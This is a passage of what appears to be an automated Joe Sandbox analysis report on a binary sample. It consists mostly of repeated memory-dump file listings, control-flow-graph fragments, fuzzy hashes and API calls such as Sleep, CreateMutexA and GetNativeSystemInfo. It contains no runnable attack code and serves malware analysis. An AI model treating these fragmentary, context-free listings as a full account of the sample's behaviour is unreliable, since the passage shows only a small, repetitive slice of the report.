                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ff7de90f2c74d1f2a853a1d498a0f756c424ae0f3b23e636a3768261ff08c7f
                                                                                                                                                                                                                                                  • Instruction ID: 36c7c7e4ab08dda4f9e09836aec036e2a02815b1a98093e047ef48ccba5ebba6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ff7de90f2c74d1f2a853a1d498a0f756c424ae0f3b23e636a3768261ff08c7f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8213A316042109BEB18AB68FD8976DF7E2EBC1710F204299E51C8B3D5DB7699808711

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 534 b2a856-b2a86e 535 b2a870-b2a87c 534->535 536 b2a89c-b2a89e 534->536 539 b2a892-b2a899 call b3d663 535->539 540 b2a87e-b2a88c 535->540 537 b2a8a0-b2a8a7 536->537 538 b2a8a9-b2a8b1 call b27d30 536->538 543 b2a8eb-b2a916 call b380c0 537->543 550 b2a8b3-b2a8bb call b27d30 538->550 551 b2a8e4-b2a8e6 538->551 539->536 540->539 541 b2a94e 540->541 547 b2a953-b2a987 Sleep CreateMutexA 541->547 548 b2a94e call b56c6a 541->548 553 b2a98e-b2a994 547->553 548->547 550->551 559 b2a8bd-b2a8c5 call b27d30 550->559 551->543 555 b2a996-b2a998 553->555 556 b2a9a7-b2a9a8 553->556 555->556 558 b2a99a-b2a9a5 555->558 558->556 559->551 563 b2a8c7-b2a8cf call b27d30 559->563 563->551 566 b2a8d1-b2a8d9 call b27d30 563->566 566->551 569 b2a8db-b2a8e2 566->569 569->543
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 5f6a6a22b495737bf4e66f12f92fbea0e2b37c29dce705201c720f5af55b11d1
                                                                                                                                                                                                                                                  • Instruction ID: bf695ba16da53ae6d467ec7340438d8fa2319cfad6ab8a2fdd5954a9b08a22f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f6a6a22b495737bf4e66f12f92fbea0e2b37c29dce705201c720f5af55b11d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C217F716852219BFB246769B99A73DB3D2DF81700F2004D6F10CDB3D1CF7658818653

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 511 b2a34f-b2a35b 512 b2a371-b2a39a call b3d663 511->512 513 b2a35d-b2a36b 511->513 519 b2a3c8-b2a916 call b380c0 512->519 520 b2a39c-b2a3a8 512->520 513->512 514 b2a93a 513->514 516 b2a953-b2a994 Sleep CreateMutexA 514->516 517 b2a93a call b56c6a 514->517 526 b2a996-b2a998 516->526 527 b2a9a7-b2a9a8 516->527 517->516 523 b2a3aa-b2a3b8 520->523 524 b2a3be-b2a3c5 call b3d663 520->524 523->514 523->524 524->519 526->527 530 b2a99a-b2a9a5 526->530 530->527
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 2ad88f6fc9593493e741e95131944bb6c54a7ed44a520beda6bfadd599c7689d
                                                                                                                                                                                                                                                  • Instruction ID: e7434864c67ab0421fbe0bec70efc1ebaabc0f17212be55c6a666458e4ce5e60
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ad88f6fc9593493e741e95131944bb6c54a7ed44a520beda6bfadd599c7689d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C12179316002109BEB18EB28FD8576CF7E2EBC1710F20429AE51C9B3D5CB76A5C08352

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 570 b27d30-b27db2 call b540f0 574 b28356-b28373 call b3cff1 570->574 575 b27db8-b27de0 call b37a00 call b25c10 570->575 582 b27de2 575->582 583 b27de4-b27e06 call b37a00 call b25c10 575->583 582->583 588 b27e0a-b27e23 583->588 589 b27e08 583->589 592 b27e54-b27e7f 588->592 593 b27e25-b27e34 588->593 589->588 594 b27eb0-b27ed1 592->594 595 b27e81-b27e90 592->595 596 b27e36-b27e44 593->596 597 b27e4a-b27e51 call b3d663 593->597 602 b27ed3-b27ed5 GetNativeSystemInfo 594->602 603 b27ed7-b27edc 594->603 600 b27e92-b27ea0 595->600 601 b27ea6-b27ead call b3d663 595->601 596->597 598 b28374 call b56c6a 596->598 597->592 608 b28379-b2837f call b56c6a 598->608 600->598 600->601 601->594 607 b27edd-b27ee6 602->607 603->607 611 b27f04-b27f07 607->611 612 b27ee8-b27eef 607->612 615 b282f7-b282fa 611->615 616 b27f0d-b27f16 611->616 613 b28351 612->613 614 b27ef5-b27eff 612->614 613->574 618 b2834c 614->618 615->613 621 b282fc-b28305 615->621 619 b27f18-b27f24 616->619 620 b27f29-b27f2c 616->620 618->613 619->618 623 b27f32-b27f39 620->623 624 b282d4-b282d6 620->624 625 b28307-b2830b 621->625 626 b2832c-b2832f 621->626 629 b28019-b282bd call b37a00 call b25c10 call b37a00 call b25c10 call b25d50 call b37a00 call b25c10 call b25730 call b37a00 call b25c10 call b37a00 call b25c10 call b25d50 call b37a00 call b25c10 call b25730 call b37a00 call b25c10 call b37a00 call b25c10 call b25d50 call b37a00 call b25c10 call b25730 call b37a00 call b25c10 call b37a00 call b25c10 call b25d50 call b37a00 call b25c10 call b25730 623->629 630 b27f3f-b27f9b call b37a00 call b25c10 call b37a00 call b25c10 call b25d50 623->630 627 b282e4-b282e7 624->627 628 b282d8-b282e2 624->628 631 b28320-b2832a 625->631 632 b2830d-b28312 625->632 633 b28331-b2833b 626->633 634 b2833d-b28349 626->634 627->613 635 b282e9-b282f5 627->635 628->618 669 b282c3-b282cc 629->669 655 b27fa0-b27fa7 630->655 631->613 632->631 637 b28314-b2831e 632->637 633->613 634->618 635->618 637->613 657 b27fab-b27fcb call b58bbe 655->657 658 b27fa9 655->658 664 b28002-b28004 657->664 665 b27fcd-b27fdc 657->665 658->657 664->669 670 b2800a-b28014 664->670 667 b27ff2-b27fff call b3d663 665->667 668 b27fde-b27fec 665->668 667->664 668->608 668->667 669->615 674 b282ce 669->674 670->669 674->624
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B27ED3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
